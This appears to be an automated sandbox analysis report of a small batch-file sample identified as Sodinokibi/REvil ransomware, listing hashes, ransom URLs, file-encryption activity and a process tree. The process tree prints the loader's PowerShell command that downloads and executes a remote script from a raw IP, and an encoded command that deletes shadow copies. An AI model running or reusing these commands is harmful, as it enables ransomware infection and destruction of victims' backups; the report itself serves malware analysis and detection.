Analysis
-
max time kernel
106s -
max time network
106s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
25-02-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
E6ZiuRBj.bat
Resource
win7v200217
Behavioral task
behavioral2
Sample
E6ZiuRBj.bat
Resource
win10v200217
General
-
Target
E6ZiuRBj.bat
-
Size
192B
-
MD5
2249a41a0632a89a141033f45d9c71d8
-
SHA1
d11ba758c8a87a62e773a95e5cd01787fdae226c
-
SHA256
03d85057c6e2669996196110f2b048f3de2e021f8806b61b6e4696ccc802e742
-
SHA512
c59548a6636bf85403b1ea379760d5310e1d8aebc859227340d68de07eb3ec63672a31db38ef6cd519f58139c192a0e4a03adfbce34c42708b7c630c172a499a
Malware Config
Extracted
http://185.103.242.78/pastes/E6ZiuRBj
Extracted
C:\hp0ws8n-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9180D364F1EFBA80
http://decryptor.cc/9180D364F1EFBA80
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1860 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g31db2k04555.bmp" powershell.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File renamed C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.hp0ws8n powershell.exe File opened for modification \??\c:\program files\UnpublishConvertTo.rmi powershell.exe File opened for modification \??\c:\program files\SplitRestart.bmp powershell.exe File renamed C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.hp0ws8n powershell.exe File opened for modification \??\c:\program files\ConvertToFormat.ini powershell.exe File renamed C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.hp0ws8n powershell.exe File opened for modification \??\c:\program files\RestartUninstall.midi powershell.exe File renamed C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.hp0ws8n powershell.exe File created \??\c:\program files\hp0ws8n-readme.txt powershell.exe File opened for modification \??\c:\program files\MoveWait.tif powershell.exe File opened for modification \??\c:\program files\SkipApprove.xhtml powershell.exe File created \??\c:\program files (x86)\hp0ws8n-readme.txt powershell.exe File opened for modification \??\c:\program files\EditRepair.mpv2 powershell.exe File opened for modification \??\c:\program files\ExpandProtect.ods powershell.exe File renamed C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.hp0ws8n powershell.exe File opened for modification \??\c:\program files\RestartSave.xltm powershell.exe File renamed C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.hp0ws8n powershell.exe File renamed C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.hp0ws8n powershell.exe File renamed C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.hp0ws8n powershell.exe File renamed C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.hp0ws8n powershell.exe File opened for modification \??\c:\program files\SuspendGrant.m4a powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\hp0ws8n-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableCopy.M2T powershell.exe File created \??\c:\program files\microsoft sql server compact edition\hp0ws8n-readme.txt powershell.exe File renamed C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.hp0ws8n powershell.exe File renamed C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.hp0ws8n powershell.exe File renamed C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.hp0ws8n powershell.exe File renamed C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.hp0ws8n powershell.exe File renamed C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.hp0ws8n powershell.exe File opened for modification \??\c:\program files\GrantOpen.inf powershell.exe File opened for modification \??\c:\program files\LockBackup.au powershell.exe File opened for modification \??\c:\program files\UnpublishSync.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\hp0ws8n-readme.txt powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1836 wrote to memory of 1860 1836 cmd.exe powershell.exe PID 1860 wrote to memory of 1972 1860 powershell.exe powershell.exe PID 1860 wrote to memory of 1972 1860 powershell.exe powershell.exe PID 1860 wrote to memory of 1972 1860 powershell.exe powershell.exe PID 1860 wrote to memory of 1972 1860 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeBackupPrivilege 1424 vssvc.exe Token: SeRestorePrivilege 1424 vssvc.exe Token: SeAuditPrivilege 1424 vssvc.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1860 powershell.exe 1860 powershell.exe 1860 powershell.exe 1972 powershell.exe 1972 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1860 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.exepowershell.execmd.exedescription ioc process File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\E6ZiuRBj.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/E6ZiuRBj');Invoke-VBJTAAEQT;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Discovering connected drives
PID:1860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
PID:1972
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1424